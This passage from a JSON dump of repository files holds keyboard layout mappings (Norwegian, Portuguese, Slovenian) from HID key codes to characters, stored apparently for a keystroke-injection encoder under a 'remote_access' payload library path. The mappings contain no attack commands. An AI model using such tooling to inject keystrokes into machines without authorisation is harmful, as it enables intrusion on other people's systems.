= 15\nKEY_M = 16\nKEY_N = 17\nKEY_O = 18\nKEY_P = 19\nKEY_Q = 20\nKEY_R = 21\nKEY_S = 22\nKEY_T = 23\nKEY_U = 24\nKEY_V = 25\nKEY_W = 26\nKEY_X = 27\nKEY_Y = 28\nKEY_Z = 29\nKEY_1 = 30\nKEY_2 = 31\nKEY_3 = 32\nKEY_4 = 33\nKEY_5 = 34\nKEY_6 = 35\nKEY_7 = 36\nKEY_8 = 37\nKEY_9 = 38\nKEY_0 = 39\nKEY_ENTER = 40\nKEY_ESC = 41\nKEY_BACKSPACE = 42\nKEY_TAB = 43\nKEY_SPACE = 44\nKEY_MINUS = 45\nKEY_EQUAL = 46\nKEY_LEFT_BRACE = 47\nKEY_RIGHT_BRACE = 48\nKEY_BACKSLASH = 49\nKEY_NON_US_NUM = 50\nKEY_SEMICOLON = 51\nKEY_QUOTE = 52\nKEY_TILDE = 53\nKEY_COMMA = 54\nKEY_PERIOD = 55\nKEY_SLASH = 56\nKEY_CAPS_LOCK = 57\nKEY_F1 = 58\nKEY_F2 = 59\nKEY_F3 = 60\nKEY_F4 = 61\nKEY_F5 = 62\nKEY_F6 = 63\nKEY_F7 = 64\nKEY_F8 = 65\nKEY_F9 = 66\nKEY_F10 = 67\nKEY_F11 = 68\nKEY_F12 = 69\nKEY_PRINTSCREEN = 70\nKEY_SCROLL_LOCK = 71\nKEY_PAUSE = 72\nKEY_INSERT = 73\nKEY_HOME = 74\nKEY_PAGEUP = 75\nKEY_DELETE = 76\nKEY_END = 77\nKEY_PAGEDOWN = 78\nKEY_RIGHT = 79\nKEY_LEFT = 80\nKEY_DOWN = 81\nKEY_UP = 82\nKEY_NUM_LOCK = 83\nKEYPAD_SLASH = 84\nKEYPAD_ASTERIX = 85\nKEYPAD_MINUS = 86\nKEYPAD_PLUS = 87\nKEYPAD_ENTER = 88\nKEYPAD_EQUALS = 103\nKEYPAD_1 = 89\nKEYPAD_2 = 90\nKEYPAD_3 = 91\nKEYPAD_4 = 92\nKEYPAD_5 = 93\nKEYPAD_6 = 94\nKEYPAD_7 = 95\nKEYPAD_8 = 96\nKEYPAD_9 = 97\nKEYPAD_0 = 98\nKEYPAD_PERIOD = 99\n\nKEY_APP = 0x65\nKEY_POWER = 0x66\nKEY_EXE = 0x74\nKEY_HELP = 0x75\nKEY_MENU = 0x76\nKEY_SELECT = 0x77\nKEY_STOP = 0x78\nKEY_AGAIN = 0x79\nKEY_UNDO = 0x7A\nKEY_CUT = 0x7B\nKEY_COPY = 0x7C\nKEY_PASTE = 0x7D\nKEY_FIND = 0x7E\n\nKEY_SYSTEM_POWER = 0x81\nKEY_SYSTEM_SLEEP = 0x82\nKEY_SYSTEM_WAKE = 0x83\n\nKEYPAD_PIPE = 0xC9\n\nKEY_LEFT_CTRL = 0xE0\nKEY_LEFT_SHIFT = 0xE1\nKEY_LEFT_ALT = 0xE2\nKEY_LEFT_GUI = 0xE3\nKEY_COMMAND = 0xE3\nKEY_RIGHT_CTRL = 0xE4\nKEY_RIGHT_SHIFT= 0xE5\nKEY_RIGHT_ALT = 0xE6\nKEY_RIGHT_GUI = 0xE7\n" }, { "path": "payloads/library/remote_access/duckNet/Encoder/resources/no.properties", "content": "#ifdef LAYOUT_NORWEGIAN\n//Credits go to r.hegazi for patch (11/09/2013)\n\nKEY_NON_US_100 = 100\n\nASCII_20 = KEY_SPACE\n// 32 \nASCII_21 = KEY_1, MODIFIERKEY_SHIFT\n// 33 !\nASCII_22 = KEY_2, MODIFIERKEY_SHIFT\n// 34 \"\nASCII_23 = KEY_3, MODIFIERKEY_SHIFT\n// 35 #\nASCII_24 = KEY_4, MODIFIERKEY_RIGHT_ALT\n// 36 $\nASCII_25 = KEY_5, MODIFIERKEY_SHIFT\n// 37 %\nASCII_26 = KEY_6, MODIFIERKEY_SHIFT\n// 38 &\nASCII_27 = KEY_BACKSLASH\n// 39 ' \nASCII_28 = KEY_8, MODIFIERKEY_SHIFT\n// 40 ( \nASCII_29 = KEY_9, MODIFIERKEY_SHIFT\n// 41 )\nASCII_2A = KEY_BACKSLASH, MODIFIERKEY_SHIFT\n// 42 *\nASCII_2B = KEY_MINUS\n// 43 +\nASCII_2C = KEY_COMMA\n// 44 ,\nASCII_2D = KEY_SLASH\n// 45 -\nASCII_2E = KEY_PERIOD\n// 46 .\nASCII_2F = KEY_7, MODIFIERKEY_SHIFT\n// 47 /\nASCII_30 = KEY_0\n// 48 0\nASCII_31 = KEY_1\n// 49 1\nASCII_32 = KEY_2\n// 50 2\nASCII_33 = KEY_3\n// 51 3\nASCII_34 = KEY_4\n// 52 4\nASCII_35 = KEY_5\n// 53 5\nASCII_36 = KEY_6\n// 54 6\nASCII_37 = KEY_7\n// 55 7\nASCII_38 = KEY_8\n// 55 8\nASCII_39 = KEY_9\n// 57 9\nASCII_3A = KEY_PERIOD, MODIFIERKEY_SHIFT\n// 58 :\nASCII_3B = KEY_COMMA, MODIFIERKEY_SHIFT\n// 59 ;\nASCII_3C = KEY_NON_US_100\n// 60 <\nASCII_3D = KEY_0, MODIFIERKEY_SHIFT\n// 61 =\nASCII_3E = KEY_NON_US_100, MODIFIERKEY_SHIFT\n// 62 >\nASCII_3F = KEY_MINUS, MODIFIERKEY_SHIFT\n// 63 ?\nASCII_40 = KEY_2, MODIFIERKEY_RIGHT_ALT\n// 64 @\nASCII_41 = KEY_A, MODIFIERKEY_SHIFT\n// 65 A\nASCII_42 = KEY_B, MODIFIERKEY_SHIFT\n// 66 B\nASCII_43 = KEY_C, MODIFIERKEY_SHIFT\n// 67 C\nASCII_44 = KEY_D, MODIFIERKEY_SHIFT\n// 68 D\nASCII_45 = KEY_E, MODIFIERKEY_SHIFT\n// 69 E\nASCII_46 = KEY_F, MODIFIERKEY_SHIFT\n// 70 F\nASCII_47 = KEY_G, MODIFIERKEY_SHIFT\n// 71 G\nASCII_48 = KEY_H, MODIFIERKEY_SHIFT\n// 72 H\nASCII_49 = KEY_I, MODIFIERKEY_SHIFT\n// 73 I\nASCII_4A = KEY_J, MODIFIERKEY_SHIFT\n// 74 J\nASCII_4B = KEY_K, MODIFIERKEY_SHIFT\n// 75 K\nASCII_4C = KEY_L, MODIFIERKEY_SHIFT\n// 76 L\nASCII_4D = KEY_M, MODIFIERKEY_SHIFT\n// 77 M\nASCII_4E = KEY_N, MODIFIERKEY_SHIFT\n// 78 N\nASCII_4F = KEY_O, MODIFIERKEY_SHIFT\n// 79 O\nASCII_50 = KEY_P, MODIFIERKEY_SHIFT\n// 80 P\nASCII_51 = KEY_Q, MODIFIERKEY_SHIFT\n// 81 Q\nASCII_52 = KEY_R, MODIFIERKEY_SHIFT\n// 82 R\nASCII_53 = KEY_S, MODIFIERKEY_SHIFT\n// 83 S\nASCII_54 = KEY_T, MODIFIERKEY_SHIFT\n// 84 T\nASCII_55 = KEY_U, MODIFIERKEY_SHIFT\n// 85 U\nASCII_56 = KEY_V, MODIFIERKEY_SHIFT\n// 86 V\nASCII_57 = KEY_W, MODIFIERKEY_SHIFT\n// 87 W\nASCII_58 = KEY_X, MODIFIERKEY_SHIFT\n// 88 X\nASCII_59 = KEY_Y, MODIFIERKEY_SHIFT\n// 89 Y\nASCII_5A = KEY_Z, MODIFIERKEY_SHIFT\n// 90 Z\nASCII_5B = KEY_8, MODIFIERKEY_RIGHT_ALT\n// 91 [\nASCII_5C = KEY_EQUAL\n// 92 \nASCII_5D = KEY_9, MODIFIERKEY_RIGHT_ALT\n// 93 ]\nASCII_5E = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT\n// 94 ^\nASCII_5F = KEY_SLASH, MODIFIERKEY_SHIFT\n// 95 _\nASCII_60 = KEY_EQUAL, MODIFIERKEY_SHIFT\n// 96 `\nASCII_61 = KEY_A\n// 97 a\nASCII_62 = KEY_B\n// 98 b\nASCII_63 = KEY_C\n// 99 c\nASCII_64 = KEY_D\n// 100 d\nASCII_65 = KEY_E\n// 101 e\nASCII_66 = KEY_F\n// 102 f\nASCII_67 = KEY_G\n// 103 g\nASCII_68 = KEY_H\n// 104 h\nASCII_69 = KEY_I\n// 105 i\nASCII_6A = KEY_J\n// 106 j\nASCII_6B = KEY_K\n// 107 k\nASCII_6C = KEY_L\n// 108 l\nASCII_6D = KEY_M\n// 109 m\nASCII_6E = KEY_N\n// 110 n\nASCII_6F = KEY_O\n// 111 o\nASCII_70 = KEY_P\n// 112 p\nASCII_71 = KEY_Q\n// 113 q\nASCII_72 = KEY_R\n// 114 r\nASCII_73 = KEY_S\n// 115 s\nASCII_74 = KEY_T\n// 116 t\nASCII_75 = KEY_U\n// 117 u\nASCII_76 = KEY_V\n// 118 v\nASCII_77 = KEY_W\n// 119 w\nASCII_78 = KEY_X\n// 120 x\nASCII_79 = KEY_Y\n// 121 y\nASCII_7A = KEY_Z\n// 122 z\nASCII_7B = KEY_7, MODIFIERKEY_RIGHT_ALT\n// 123 {\nASCII_7C = KEY_TILDE\n// 124 |\nASCII_7D = KEY_0, MODIFIERKEY_RIGHT_ALT\n// 125 }\nASCII_7E = KEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT\n// 126 ~ (not tested)\nASCII_7F = KEY_BACKSPACE\n// 127\n\nISO_8859_1_A0 = KEY_SPACE\n// 160 Nonbreakng Space\nISO_8859_1_A3 = KEY_3, MODIFIERKEY_RIGHT_ALT\n// 163 £ Pound Sign\nISO_8859_1_A4 = KEY_4, MODIFIERKEY_SHIFT\n// 164 ¤ Currency Sign\nISO_8859_1_A7 = KEY_TILDE, MODIFIERKEY_SHIFT\n// 167 § SECTION SIGN\n//ISO_8859_1_A8 = DIAERESIS_BITS + KEY_SPACE\n// 168 ¨ DIAERESIS\nISO_8859_1_AB = KEY_4\n// 171 « LEFT DOUBLE ANGLE QUOTE\n//ISO_8859_1_B4 = ACUTE_ACCENT_BITS + KEY_SPACE\n// 180 ´ ACUTE ACCENT\nISO_8859_1_B5 = KEY_M, MODIFIERKEY_RIGHT_ALT\n// 181 µ MICRO SIGN\nISO_8859_1_BD = KEY_TILDE\n// 189 ½ FRACTION ONE HALF\n//ISO_8859_1_C0 = GRAVE_ACCENT_BITS + KEY_A, MODIFIERKEY_SHIFT = \n// 192 À A GRAVE\n//ISO_8859_1_C1 = ACUTE_ACCENT_BITS + KEY_A, MODIFIERKEY_SHIFT = \n// 193 Á A ACUTE\n//ISO_8859_1_C2 = CIRCUMFLEX_BITS + KEY_A, MODIFIERKEY_SHIFT = \n// 194  A CIRCUMFLEX\n//ISO_8859_1_C3 = TILDE_BITS + KEY_A, MODIFIERKEY_SHIFT\n// 195 à A TILDE\n//ISO_8859_1_C4 = DIAERESIS_BITS + KEY_A, MODIFIERKEY_SHIFT = \n// 196 Ä A DIAERESIS\nISO_8859_1_C5 = KEY_LEFT_BRACE, MODIFIERKEY_SHIFT\n// 197 Å A RING ABOVE\nISO_8859_1_C6 = KEY_QUOTE, MODIFIERKEY_SHIFT\n// 198 Æ AE\n//ISO_8859_1_C8 = GRAVE_ACCENT_BITS + KEY_E, MODIFIERKEY_SHIFT = \n// 200 È E GRAVE\n//ISO_8859_1_C9 = ACUTE_ACCENT_BITS + KEY_E, MODIFIERKEY_SHIFT = \n// 201 É E ACUTE\n//ISO_8859_1_CA = CIRCUMFLEX_BITS + KEY_E, MODIFIERKEY_SHIFT = \n// 202 Ê E CIRCUMFLEX\n//ISO_8859_1_CB = DIAERESIS_BITS + KEY_E, MODIFIERKEY_SHIFT = \n// 203 Ë E DIAERESIS\n//ISO_8859_1_CC = GRAVE_ACCENT_BITS + KEY_I, MODIFIERKEY_SHIFT = \n// 204 Ì I GRAVE\n//ISO_8859_1_CD = ACUTE_ACCENT_BITS + KEY_I, MODIFIERKEY_SHIFT = \n// 205 Í I ACUTE\n//ISO_8859_1_CE = CIRCUMFLEX_BITS + KEY_I, MODIFIERKEY_SHIFT = \n// 206 Î I CIRCUMFLEX\n//ISO_8859_1_CF = DIAERESIS_BITS + KEY_I, MODIFIERKEY_SHIFT = \n// 207 Ï I DIAERESIS\n//ISO_8859_1_D0 = KEY_D, MODIFIERKEY_RIGHT_ALT, MODIFIERKEY_SHIFT\n// 208 Ð ETH\n//ISO_8859_1_D1 = TILDE_BITS + KEY_N, MODIFIERKEY_SHIFT\n// 209 Ñ N TILDE\n//ISO_8859_1_D2 = GRAVE_ACCENT_BITS + KEY_O, MODIFIERKEY_SHIFT = \n// 210 Ò O GRAVE\n//ISO_8859_1_D3 = ACUTE_ACCENT_BITS + KEY_O, MODIFIERKEY_SHIFT = \n// 211 Ó O ACUTE\n//ISO_8859_1_D4 = CIRCUMFLEX_BITS + KEY_O, MODIFIERKEY_SHIFT = \n// 212 Ô O CIRCUMFLEX\n//ISO_8859_1_D5 = TILDE_BITS + KEY_O, MODIFIERKEY_SHIFT\n// 213 Õ O TILDE\n//ISO_8859_1_D6 = DIAERESIS_BITS + KEY_O, MODIFIERKEY_SHIFT = \n// 214 Ö O DIAERESIS\nISO_8859_1_D8 = KEY_SEMICOLON, MODIFIERKEY_SHIFT\n// 216 Ø O STROKE\n//ISO_8859_1_D9 = GRAVE_ACCENT_BITS + KEY_U, MODIFIERKEY_SHIFT = \n// 217 Ù U GRAVE\n//ISO_8859_1_DA = ACUTE_ACCENT_BITS + KEY_U, MODIFIERKEY_SHIFT = \n// 218 Ú U ACUTE\n//ISO_8859_1_DB = CIRCUMFLEX_BITS + KEY_U, MODIFIERKEY_SHIFT = \n// 219 Û U CIRCUMFLEX\n//ISO_8859_1_DC = DIAERESIS_BITS + KEY_U, MODIFIERKEY_SHIFT = \n// 220 Ü U DIAERESIS\n//ISO_8859_1_DD = ACUTE_ACCENT_BITS + KEY_Y, MODIFIERKEY_SHIFT = \n// 221 Ý Y ACUTE\n//ISO_8859_1_DE = KEY_T, MODIFIERKEY_RIGHT_ALT, MODIFIERKEY_SHIFT\n// 222 Þ THORN\nISO_8859_1_DF = KEY_S, MODIFIERKEY_RIGHT_ALT\n// 223 ß SHARP S\n//ISO_8859_1_E0 = GRAVE_ACCENT_BITS + KEY_A\n// 224 à a GRAVE\n//ISO_8859_1_E1 = ACUTE_ACCENT_BITS + KEY_A\n// 225 á a ACUTE\n//ISO_8859_1_E2 = CIRCUMFLEX_BITS + KEY_A\n// 226 â a CIRCUMFLEX\n//ISO_8859_1_E3 = TILDE_BITS + KEY_A\n// 227 ã a TILDE\n//ISO_8859_1_E4 = DIAERESIS_BITS + KEY_A\n// 228 ä a DIAERESIS\nISO_8859_1_E5 = KEY_LEFT_BRACE\n// 229 å a RING ABOVE\nISO_8859_1_E6 = KEY_QUOTE\n// 230 æ ae\n//ISO_8859_1_E8 = GRAVE_ACCENT_BITS + KEY_E\n// 232 è e GRAVE\n//ISO_8859_1_E9 = ACUTE_ACCENT_BITS + KEY_E\n// 233 é e ACUTE\n//ISO_8859_1_EA = CIRCUMFLEX_BITS + KEY_E\n// 234 ê e CIRCUMFLEX\n//ISO_8859_1_EB = DIAERESIS_BITS + KEY_E\n// 235 ë e DIAERESIS\n//ISO_8859_1_EC = GRAVE_ACCENT_BITS + KEY_I\n// 236 ì i GRAVE\n//ISO_8859_1_ED = ACUTE_ACCENT_BITS + KEY_I\n// 237 í i ACUTE\n//ISO_8859_1_EE = CIRCUMFLEX_BITS + KEY_I\n// 238 î i CIRCUMFLEX\n//ISO_8859_1_EF = DIAERESIS_BITS + KEY_I\n// 239 ï i DIAERESIS\nISO_8859_1_F0 = KEY_D, MODIFIERKEY_RIGHT_ALT\n// 240 ð ETH\n//ISO_8859_1_F1 = TILDE_BITS + KEY_N\n// 241 ñ n TILDE\n//ISO_8859_1_F2 = GRAVE_ACCENT_BITS + KEY_O\n// 242 ò o GRAVE\n//ISO_8859_1_F3 = ACUTE_ACCENT_BITS + KEY_O\n// 243 ó o ACUTE\n//ISO_8859_1_F4 = CIRCUMFLEX_BITS + KEY_O\n// 244 ô o CIRCUMFLEX\n//ISO_8859_1_F5 = TILDE_BITS + KEY_O\n// 245 õ o TILDE\n//ISO_8859_1_F6 = DIAERESIS_BITS + KEY_O\n// 246 ö o DIAERESIS\nISO_8859_1_F8 = KEY_SEMICOLON\n// 248 ø o STROKE\n//ISO_8859_1_F9 = GRAVE_ACCENT_BITS + KEY_U\n// 249 ù u GRAVE\n//ISO_8859_1_FA = ACUTE_ACCENT_BITS + KEY_U\n// 250 ú u ACUTE\n//ISO_8859_1_FB = CIRCUMFLEX_BITS + KEY_U\n// 251 û u CIRCUMFLEX\n//ISO_8859_1_FC = DIAERESIS_BITS + KEY_U\n// 252 ü u DIAERESIS\n//ISO_8859_1_FD = ACUTE_ACCENT_BITS + KEY_Y\n// 253 ý y ACUTE\nISO_8859_1_FE = KEY_T, MODIFIERKEY_RIGHT_ALT\n// 254 þ THORN\n//ISO_8859_1_FF = DIAERESIS_BITS + KEY_Y\n// 255 ÿ y DIAERESIS\nUNICODE_20AC = KEY_E, MODIFIERKEY_RIGHT_ALT\n// € Euro Sign\n\n" }, { "path": "payloads/library/remote_access/duckNet/Encoder/resources/pt.properties", "content": "// Portuguese keyboard 102-keys layout\r\n\r\n// Keyboard Non-US# and ~ \r\n// Typical language mappings: US: \\| Belg: μ`£ FrCa: <}> Dan:’* Dutch: <> Fren:*μ Ger: #’ Ital: ù§ LatAm: }`] Nor:,* Span:}Ç Swed: ,* Swiss: $£ UK: #~ Port: ~^ .\r\nKEY_NON_US_NUM = 50\r\n// Keyboard Non-US\\ and |\r\n// Typical language mappings: Belg:<\\> FrCa:«°» Dan:<\\> Dutch:]|[ Fren:<> Ger:<|> Ital:<> LatAm:<> Nor:<> Span:<> Swed:<|> Swiss:<\\> UK:\\| Brazil: \\| Portuguese: <> .\r\nKEY_NON_US_100 = 100 \r\n\r\n// 32 \r\nASCII_20 = KEY_SPACE\t\t\t\t\t\r\n// 33 ! 49 1\r\nASCII_21 = KEY_1, MODIFIERKEY_SHIFT\r\nASCII_31 = KEY_1\r\n// 34 \" 50 2\r\nASCII_22 = KEY_2, MODIFIERKEY_SHIFT\t\r\nASCII_32 = KEY_2\t\t\t\t\r\n// 35 # 51 3\r\nASCII_23 = KEY_3, MODIFIERKEY_SHIFT\r\nASCII_33 = KEY_3\t\t\t\t\r\n// 36 $ 52 4\r\nASCII_24 = KEY_4, MODIFIERKEY_SHIFT\r\nASCII_34 = KEY_4\t\t\t\t\r\n// 37 % 53 5\r\nASCII_25 = KEY_5, MODIFIERKEY_SHIFT\r\nASCII_35 = KEY_5\t\t\t\r\n// 38 & 35 6\r\nASCII_26 = KEY_6, MODIFIERKEY_SHIFT\r\nASCII_36 = KEY_6\t\r\n// 47 SLASH 55 7\r\nASCII_2F = KEY_7, MODIFIERKEY_SHIFT\r\nASCII_37 = KEY_7\r\n// 40 ( 55 8\r\nASCII_28 = KEY_8, MODIFIERKEY_SHIFT\r\nASCII_38 = KEY_8\r\n// 41 ) 57 9\r\nASCII_29 = KEY_9, MODIFIERKEY_SHIFT\r\nASCII_39 = KEY_9\t\r\n// 61 = 48 0\r\nASCII_3D = KEY_0, MODIFIERKEY_SHIFT\r\nASCII_30 = KEY_0\r\n// 39 ' 63 ? \r\nASCII_3F = KEY_MINUS, MODIFIERKEY_SHIFT\t\r\nASCII_27 = KEY_MINUS\t\r\n// 42 * 43 +\r\nASCII_2A = KEY_LEFT_BRACE, MODIFIERKEY_SHIFT\t\t\t\r\nASCII_2B = KEY_LEFT_BRACE\r\n// 44 , 59 ;\r\nASCII_2C = KEY_COMMA\r\nASCII_3B = KEY_COMMA, MODIFIERKEY_SHIFT\t\t\t\r\n// 45 - 95 _\r\nASCII_2D = KEY_SLASH,\r\nASCII_5F = KEY_SLASH, MODIFIERKEY_SHIFT\t\r\n// 46 . 58 :\r\nASCII_2E = KEY_PERIOD\r\nASCII_3A = KEY_PERIOD, MODIFIERKEY_SHIFT\t\t\t\r\n// 60 < 62 >\r\nASCII_3C = KEY_NON_US_100\t\t\t\t\r\nASCII_3E = KEY_NON_US_100, MODIFIERKEY_SHIFT\t\t\t\t\t\r\n// 64 @\r\nASCII_40 = KEY_2, MODIFIERKEY_RIGHT_ALT\t\t\t\t\r\n// 65 A\r\nASCII_41 = KEY_A, MODIFIERKEY_SHIFT\r\n// 66 B\r\nASCII_42 = KEY_B, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 67 C\r\nASCII_43 = KEY_C, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 68 D\r\nASCII_44 = KEY_D, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 69 E\r\nASCII_45 = KEY_E, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 70 F\r\nASCII_46 = KEY_F, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 71 G\r\nASCII_47 = KEY_G, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 72 H\r\nASCII_48 = KEY_H, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 73 I\r\nASCII_49 = KEY_I, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 74 J\r\nASCII_4A = KEY_J, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 75 K\r\nASCII_4B = KEY_K, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 76 L\r\nASCII_4C = KEY_L, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 77 M\r\nASCII_4D = KEY_M, MODIFIERKEY_SHIFT\t\t\t\r\n// 78 N\r\nASCII_4E = KEY_N, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 79 O\r\nASCII_4F = KEY_O, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 80 P\r\nASCII_50 = KEY_P, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 81 Q\r\nASCII_51 = KEY_Q, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 82 R\r\nASCII_52 = KEY_R, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 83 S\r\nASCII_53 = KEY_S, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 84 T\r\nASCII_54 = KEY_T, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 85 U\r\nASCII_55 = KEY_U, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 86 V\r\nASCII_56 = KEY_V, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 87 W\r\nASCII_57 = KEY_W, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 88 X\r\nASCII_58 = KEY_X, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 89 Y\r\nASCII_59 = KEY_Y, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 90 Z\r\nASCII_5A = KEY_Z, MODIFIERKEY_SHIFT\t\t\t\t\r\n// 91 [ 93 ]\r\nASCII_5B = KEY_8, MODIFIERKEY_RIGHT_ALT\t\t\t\t\r\nASCII_5D = KEY_9, MODIFIERKEY_RIGHT_ALT\t\t\t\r\n// 94 ^ 126 ~\r\nASCII_5E = KEY_NON_US_NUM, MODIFIERKEY_SHIFT\r\nASCII_7E = KEY_NON_US_NUM\r\n// 96 `\r\nASCII_60 = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT\t\t\r\n// 97 a\r\nASCII_61 = KEY_A\r\n// 98 b\r\nASCII_62 = KEY_B\t\t\t\t\t\r\n// 99 c\r\nASCII_63 = KEY_C\r\n// 100 d\r\nASCII_64 = KEY_D\t\t\t\t\t\r\n// 101 e\r\nASCII_65 = KEY_E\t\t\t\t\t\r\n// 102 f\r\nASCII_66 = KEY_F\t\t\t\t\t\r\n// 103 g\r\nASCII_67 = KEY_G\t\t\t\t\t\r\n// 104 h\r\nASCII_68 = KEY_H\t\t\t\t\t\r\n// 105 i\r\nASCII_69 = KEY_I\t\t\t\t\t\r\n// 106 j\r\nASCII_6A = KEY_J\t\t\t\t\t\r\n// 107 k\r\nASCII_6B = KEY_K\t\t\t\t\t\r\n// 108 l\r\nASCII_6C = KEY_L\t\t\t\t\t\r\n// 109 m\r\nASCII_6D = KEY_M\t\t\t\t\r\n// 110 n\r\nASCII_6E = KEY_N\t\t\t\t\t\r\n// 111 o\r\nASCII_6F = KEY_O\t\t\t\t\t\r\n// 112 p\r\nASCII_70 = KEY_P\t\t\t\t\t\r\n// 113 q\r\nASCII_71 = KEY_Q\t\t\t\t\t\r\n// 114 r\r\nASCII_72 = KEY_R\t\t\t\t\t\r\n// 115 s\r\nASCII_73 = KEY_S\t\t\t\t\t\r\n// 116 t\r\nASCII_74 = KEY_T\t\t\t\t\t\r\n// 117 u\r\nASCII_75 = KEY_U\t\t\t\t\t\r\n// 118 v\r\nASCII_76 = KEY_V\t\t\t\t\t\r\n// 119 w\r\nASCII_77 = KEY_W\t\t\t\t\t\r\n// 120 x\r\nASCII_78 = KEY_X\t\t\t\t\t\r\n// 121 y\r\nASCII_79 = KEY_Y\t\t\t\t\t\r\n// 122 z\r\nASCII_7A = KEY_Z\t\t\t\t\t\r\n// 123 { 125 }\r\nASCII_7B = KEY_7, MODIFIERKEY_RIGHT_ALT\t\r\nASCII_7D = KEY_0, MODIFIERKEY_RIGHT_ALT\t\t\t\r\n// 124 | 92 \r\nASCII_7C = KEY_TILDE, MODIFIERKEY_SHIFT\t\r\nASCII_5C = KEY_TILDE\t\t\t\r\n// 127\r\nASCII_7F = KEY_BACKSPACE\r\n//231 ç 199 Ç\r\nISO_8859_1_E7 = KEY_SEMICOLON\r\nISO_8859_1_C7 = KEY_SEMICOLON, MODIFIERKEY_SHIFT\r\n//ºª\r\nISO_8859_1_BA = KEY_QUOTE\r\nISO_8859_1_AA = KEY_QUOTE, MODIFIERKEY_SHIFT\r\n// 167 § SECTION SIGN\r\nISO_8859_1_A7 = KEY_4, MODIFIERKEY_RIGHT_ALT\r\n// 163 £\r\nISO_8859_1_A3 = KEY_3, MODIFIERKEY_RIGHT_ALT\r\n// Euro Sign\r\nUNICODE_20AC = KEY_E, MODIFIERKEY_RIGHT_ALT\r\n// 171 « 187 »\r\nISO_8859_1_AB = KEY_EQUAL\r\nISO_8859_1_BB = KEY_EQUAL, MODIFIERKEY_SHIFT\r\n" }, { "path": "payloads/library/remote_access/duckNet/Encoder/resources/si.properties", "content": "//LAYOUT_SLOVENIAN\n//Translation by ziolity (01/08/2014) \n//Updated by ziolity on (03/08/2014) (small fix)\nKEY_NON_US_100 = 100\n\n// Nonbreakng Space\n// a b c č d e f g h i j k l m n o p r s š t u v z ž x y q w ć đ\nASCII_20 = KEY_SPACE\nASCII_61 = KEY_A\nASCII_62 = KEY_B\nASCII_63 = KEY_C\nUNICODE_10D = KEY_SEMICOLON\nASCII_64 = KEY_D\nASCII_65 = KEY_E\nASCII_66 = KEY_F\nASCII_67 = KEY_G\nASCII_68 = KEY_H\nASCII_69 = KEY_I\nASCII_6A = KEY_J\nASCII_6B = KEY_K\nASCII_6C = KEY_L\nASCII_6D = KEY_M\nASCII_6E = KEY_N\nASCII_6F = KEY_O\nASCII_70 = KEY_P\nASCII_72 = KEY_R\nASCII_73 = KEY_S\nUNICODE_161 = KEY_LEFT_BRACE\nASCII_74 = KEY_T\nASCII_75 = KEY_U\nASCII_76 = KEY_V\nASCII_7A = KEY_Y\nUNICODE_17E = KEY_BACKSLASH\nASCII_78 = KEY_X\nASCII_79 = KEY_Z\nASCII_71 = KEY_Q\nASCII_77 = KEY_W\nUNICODE_107 = KEY_QUOTE\nUNICODE_111 = KEY_RIGHT_BRACE\n// A B C Č D E F G H I J K L M N O P R S Š T U V Z Ž X Y Q W Ć Đ\nASCII_41 = KEY_A, MODIFIERKEY_SHIFT\nASCII_42 = KEY_B, MODIFIERKEY_SHIFT\nASCII_43 = KEY_C, MODIFIERKEY_SHIFT\nUNICODE_10C = KEY_SEMICOLON, MODIFIERKEY_SHIFT\nASCII_44 = KEY_D, MODIFIERKEY_SHIFT\nASCII_45 = KEY_E, MODIFIERKEY_SHIFT\nASCII_46 = KEY_F, MODIFIERKEY_SHIFT\nASCII_47 = KEY_G, MODIFIERKEY_SHIFT\nASCII_48 = KEY_H, MODIFIERKEY_SHIFT\nASCII_49 = KEY_I, MODIFIERKEY_SHIFT\nASCII_4A = KEY_J, MODIFIERKEY_SHIFT\nASCII_4B = KEY_K, MODIFIERKEY_SHIFT\nASCII_4C = KEY_L, MODIFIERKEY_SHIFT\nASCII_4D = KEY_M, MODIFIERKEY_SHIFT\nASCII_4E = KEY_N, MODIFIERKEY_SHIFT\nASCII_4F = KEY_O, MODIFIERKEY_SHIFT\nASCII_50 = KEY_P, MODIFIERKEY_SHIFT\nASCII_52 = KEY_R, MODIFIERKEY_SHIFT\nASCII_53 = KEY_S, MODIFIERKEY_SHIFT\nUNICODE_160 = KEY_LEFT_BRACE, MODIFIERKEY_SHIFT\nASCII_54 = KEY_T, MODIFIERKEY_SHIFT\nASCII_55 = KEY_U, MODIFIERKEY_SHIFT\nASCII_56 = KEY_V, MODIFIERKEY_SHIFT\nASCII_5A = KEY_Y, MODIFIERKEY_SHIFT\nASCII_58 = KEY_X, MODIFIERKEY_SHIFT\nASCII_59 = KEY_Z, MODIFIERKEY_SHIFT\nUNICODE_17D = KEY_BACKSLASH, MODIFIERKEY_SHIFT\nASCII_51 = KEY_Q, MODIFIERKEY_SHIFT\nASCII_57 = KEY_W, MODIFIERKEY_SHIFT\nUNICODE_106 = KEY_QUOTE, MODIFIERKEY_SHIFT\nUNICODE_110 = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT\n// Symbols // ! \" # $ % & / ( ) = ? * < > , ; . : - _ [ ] ~ ` \\ | € ÷ × ł Ł ß ¤ { } § @\nASCII_21 = KEY_1, MODIFIERKEY_SHIFT\nASCII_22 = KEY_2, MODIFIERKEY_SHIFT\nASCII_23 = KEY_3, 